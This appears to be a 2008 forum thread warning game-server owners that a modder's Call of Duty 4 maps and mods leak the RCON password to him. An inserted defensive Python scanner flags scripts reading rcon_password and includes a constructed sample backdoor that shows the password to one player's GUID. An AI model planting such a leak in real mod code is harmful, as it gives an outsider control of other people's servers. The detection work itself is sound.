Security Flaw in Maps and Mods
Webs961
05-20-2008, 11:44 PM
Community members have recently decompiled modifications and maps created by community scripter, mapper, and modder KiLL3r and discovered a number of security flaws, including a backdoor that allows users with access to retrieve the RCON password of any server using the map or mod. Staff at InfinityWard.com (http://www.infinityward.com) have removed links to the mod and passwords, citing the potential security flaws.
WARNING: K3 V1.11 AND POSSIBLY PREVIOUS VERSIONS HAVE BEEN CONFIRMED TO HAVE THE ABILITY TO STEAL YOUR RCON PASSWORD -- THIS MOD ALSO HAS A BUILT-IN AIMBOT
To further prevent abuse of the security flaw, the staff at PBBans (http://www.pbbans.com) have taken an unprecedented step in issuing a manual MBI ban (http://www.pbbans.com/mbi.php?action=5&ban_id=70504) for KiLL3R across all PBBans enabled servers.
Server owners and administrators are highly advised to remove all of KiLL3R's mods from their servers until each mod is checked for malicious code and scripting.
Mods:
-K3
-Ion Cannon Mod
-Freeze Tag mod
-iBAS Beta 1.1 Mod
-UO Zombie Mod
Maps:
-Q3CTF3
-WAWA
-Maze1
-Backlot Night
-Rat House
All of these files, which were hosted on Total Gaming Files (http://files.totalgamingnetwork.com), have since been removed, and all mirrors are highly encouraged to remove these files.
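The post above tells server owners not to restore a mod until it has been checked for malicious scripting. As an added example (not part of the thread, and not KiLL3r's code or a reproduction of it), here is a Python triage script that opens an .iwd archive (a plain zip) and flags any GSC script that reads the rcon_password dvar, rating it higher when the same script also branches on one player's identity and pushes text to a client, which is the shape of backdoor the thread describes. The GSC builtin names (getDvar, getGuid, iprintlnbold, setClientDvar) are assumed from the CoD4 scripting API, and both sample scripts in the archive are constructed for the demonstration.

```python
"""Heuristic scan of CoD4-style .iwd mod archives for RCON-password leaks.

Added example for this thread; the GSC builtin names below are assumptions
about the CoD4 scripting API and the sample scripts are constructed, not
taken from any released mod.
"""
import io
import re
import zipfile
from dataclasses import dataclass, field
from typing import List, Optional

# Assumption: GSC reads server cvars with getDvar("name") (or the Int/Float
# variants) and the server's RCON password lives in the rcon_password dvar.
RCON_READ = re.compile(r'\bgetdvar(?:int|float)?\s*\(\s*"rcon_password"\s*\)', re.I)
# Assumption: a script singling out one person compares getGuid()/getPlayerName().
PLAYER_GATE = re.compile(r'\b(?:getguid|getplayername|getname)\s*\(\s*\)\s*==', re.I)
# Assumption: these builtins push text or a cvar value to a connected client.
CLIENT_OUTPUT = re.compile(r'\b(?:iprintln|iprintlnbold|setclientdvar)\s*\(', re.I)


@dataclass
class Finding:
    script: str
    severity: str
    reasons: List[str] = field(default_factory=list)


def strip_comments(src: str) -> str:
    """Drop /* */ and // comments so commented-out code cannot trigger or hide a hit."""
    src = re.sub(r'/\*.*?\*/', '', src, flags=re.S)
    return re.sub(r'//[^\n]*', '', src)


def scan_gsc(name: str, src: str) -> Optional[Finding]:
    """Return a Finding if the script touches rcon_password, else None.

    A bare read is 'medium' (no legitimate gametype needs the RCON password);
    a read combined with a per-player gate and client output is 'high'.
    """
    body = strip_comments(src)
    if not RCON_READ.search(body):
        return None
    reasons = ['reads rcon_password dvar']
    if PLAYER_GATE.search(body):
        reasons.append('branches on a specific player identity')
    if CLIENT_OUTPUT.search(body):
        reasons.append('pushes text or a cvar to a client')
    severity = 'high' if len(reasons) == 3 else 'medium'
    return Finding(name, severity, reasons)


def scan_iwd(data: bytes) -> List[Finding]:
    """Scan every .gsc inside an .iwd (a plain zip) and return all findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith('.gsc'):
                src = zf.read(info).decode('latin-1')  # GSC is ASCII; latin-1 never fails
                hit = scan_gsc(info.filename, src)
                if hit:
                    findings.append(hit)
    return findings


# Constructed sample scripts: one ordinary gametype file and one that shows the
# leak pattern. Neither is code from any real mod.
BENIGN_GSC = """
init()
{
    level.freeze_time = getDvarInt("scr_freeze_time");
    level thread onPlayerConnect();
}
"""

BACKDOOR_GSC = """
onPlayerConnect()
{
    for (;;)
    {
        level waittill("connected", player);
        if (player getGuid() == "0123456789")   // only one GUID ever sees it
            player iprintlnbold(getDvar("rcon_password"));
    }
}
"""


def build_sample_iwd() -> bytes:
    """Pack the two constructed scripts into an in-memory .iwd for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('maps/mp/gametypes/_freeze.gsc', BENIGN_GSC)
        zf.writestr('maps/mp/_welcome.gsc', BACKDOOR_GSC)
    return buf.getvalue()


if __name__ == '__main__':
    for f in scan_iwd(build_sample_iwd()):
        print(f"{f.severity.upper():6} {f.script}: {'; '.join(f.reasons)}")
```

Run it against a real archive with `scan_iwd(open('mod.iwd', 'rb').read())`. A hit is a reason to read the script by hand, not proof of a backdoor; conversely, a mod that ships compiled or obfuscated scripts, or that fetches code at runtime, is not cleared by a clean scan, so treat the result as one input to the manual review the post asks for.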
[BFE]IC|*=DaN=*
05-21-2008, 12:03 AM
It doesn't exactly 'steal' the rcon password; it just shows the password only to KiLL3r, but he could easily write down each rcon that runs his mod and then possibly breach other servers that are run by the same community, since many people use similar rcons for all servers they use... and the 'aimbot' can only be run by the bots; however, PB could pick up this 'aimbot' and think you have an installed aimbot and then ban you...
Webs961
05-21-2008, 12:12 AM
Hence it allows him to retrieve your RCON password. ;)
CptainCrunch
05-21-2008, 01:00 AM
Yea, trojan horses don't steal anything either, they just email passwords to specific hosts.
The bot stuff doesn't concern me; it's the password thing. You don't need something like that. RCON is the key to the kingdom, and though he may not have planned on using it, it's an exploit waiting for someone else to figure out and manipulate.
Good posting and good job spreading the word.
Crunch
ExitChicago
05-21-2008, 02:05 AM
Makes me wonder what other kind of bad stuff is included in these custom maps, or even worse, mods. Call me paranoid, but I'm no longer allowing downloads and not playing on any servers with mods.
JoMaMaz
05-21-2008, 04:20 PM
Makes me wonder what other kind of bad stuff is included in these custom maps, or even worse, mods. Call me paranoid, but I'm no longer allowing downloads and not playing on any servers with mods.
You're paranoid.
Oh god. So this doesn't steal our CD key?!?!
And two thumbs down to KiLL3r. Trying to steal RCONs? Pff. PB should ban him.
.reZ_TSlaw
05-21-2008, 10:53 PM
PB should ban him.
UMMMM
To further prevent abuse of the security flaw, the staff at PBBans (http://www.pbbans.com) have taken an unprecedented step in issuing a manual MBI ban (http://www.pbbans.com/mbi.php?action=5&ban_id=70504) for KiLL3R across all PBBans enabled servers.
OK, OK, I get it. What I meant to say is:
Good job, PB, for banning him, but it doesn't steal your CD key, right?
[TPG]MoFo
05-21-2008, 11:43 PM
It doesn't exactly 'steal' the rcon password; it just shows the password only to KiLL3r, but he could easily write down each rcon that runs his mod and then possibly breach other servers that are run by the same community, since many people use similar rcons for all servers they use... and the 'aimbot' can only be run by the bots; however, PB could pick up this 'aimbot' and think you have an installed aimbot and then ban you...
I could be wrong, but from the posts I saw on other boards, the aimbot is not for the bots, but works for his GUID/username allowing him to use it on servers with his mod.
^Garf*uk*
05-22-2008, 06:01 PM
what a chimp
[MyIS]Dan
05-22-2008, 06:40 PM
PB should ban him.
UMMMM
To further prevent abuse of the security flaw, the staff at PBBans (http://www.pbbans.com) have taken an unprecedented step in issuing a manual MBI ban (http://www.pbbans.com/mbi.php?action=5&ban_id=70504) for KiLL3R across all PBBans enabled servers.
That's only if the server streams to PBBans; if it's only PunkBuster, then he can still play.
.reZ_TSlaw
05-22-2008, 08:51 PM
That's only if the server streams to PBBans; if it's only PunkBuster, then he can still play.
I stand corrected.
Manzi
05-26-2008, 03:57 AM
Well, while it is a bad thing, that is a smart thing; I'm surprised no one thought of that before, really.
Alex98uk
06-03-2008, 12:54 PM
Good find. Thanks for alerting us.
KiltedCoyote
06-11-2008, 04:53 PM
Probably no one thought of it before because most modders/mappers do not think along those lines. Only idiots like this guy would think "how can I use my coding knowledge for my own personal gain".
At the end of the day this guy is breaching security on servers and writing hacks. The guy should be banned from all communities (and has been from most, I understand).